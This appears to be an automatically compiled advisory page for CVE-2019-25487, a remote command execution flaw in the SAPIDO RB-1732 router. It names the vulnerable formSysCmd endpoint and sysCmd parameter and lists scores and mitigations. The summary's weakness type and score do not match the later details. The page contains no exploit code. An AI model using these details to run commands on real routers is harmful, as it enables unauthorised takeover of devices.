CVE-2019-25487
Published: 11 March 2026
Summary
CVE-2019-25487 is a critical-severity Authorization Bypass Through User-Controlled Key (CWE-639) vulnerability. Its CVSS base score is 9.3 (Critical).
Operationally, exploitation aligns with the MITRE ATT&CK technique Exploit Public-Facing Application (T1190); ranked in the top 5.8% of CVEs by exploit likelihood; it is not currently listed in the CISA KEV catalog; a public proof-of-concept is referenced.
The strongest mitigations our analysis identified are NIST 800-53 AC-3 (Access Enforcement) and SI-10 (Information Input Validation).
Deeper analysis
CVE-2019-25487 is a remote command execution vulnerability affecting the SAPIDO RB-1732 router on firmware version V2.0.43. The issue arises in the formSysCmd endpoint, where unauthenticated attackers can submit malicious input through POST requests containing shell commands in the sysCmd parameter, leading to arbitrary system command execution on the device.
Unauthenticated attackers can exploit this vulnerability remotely over the network with low attack complexity and no privileges or user interaction required, earning it a CVSS v3.1 base score of 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H). Successful exploitation allows attackers to execute code with router privileges, potentially compromising confidentiality, integrity, and availability of the device.
Advisories referenced in VulnCheck and an Exploit-DB entry (exploit 47031) describe the vulnerability and proof-of-concept exploitation details. No specific patches or mitigation guidance is detailed in the provided information.
OWASP Top 10 for Web (2025)
EU & UK References
- 🇪🇺 ENISA EUVD: EUVD-2019-19765
Vulnerability details
SAPIDO RB-1732 V2.0.43 contains a remote command execution vulnerability that allows unauthenticated attackers to execute arbitrary system commands by submitting malicious input to the formSysCmd endpoint. Attackers can send POST requests with the sysCmd parameter containing shell commands to execute…
more
code on the device with router privileges.
- CWE(s)
Related Threats
MITRE ATT&CK Enterprise TechniquesAI
Why these techniques?
Unauthenticated RCE via public-facing router web endpoint (formSysCmd) enables exploitation of public-facing application (T1190) and arbitrary shell command execution on network device (T1059.008).
CVEs Like This One
Affected Assets
Mitigating Controls
Mitigating Controls (NIST 800-53 r5) AI
Requires validation and sanitization of the sysCmd parameter input to the formSysCmd endpoint, directly preventing arbitrary command injection and execution.
Enforces approved authorizations, requiring authentication before access to the formSysCmd endpoint and blocking unauthenticated remote attackers.
Mandates timely identification, reporting, and correction of the specific command execution flaw in the router firmware, eliminating the vulnerability.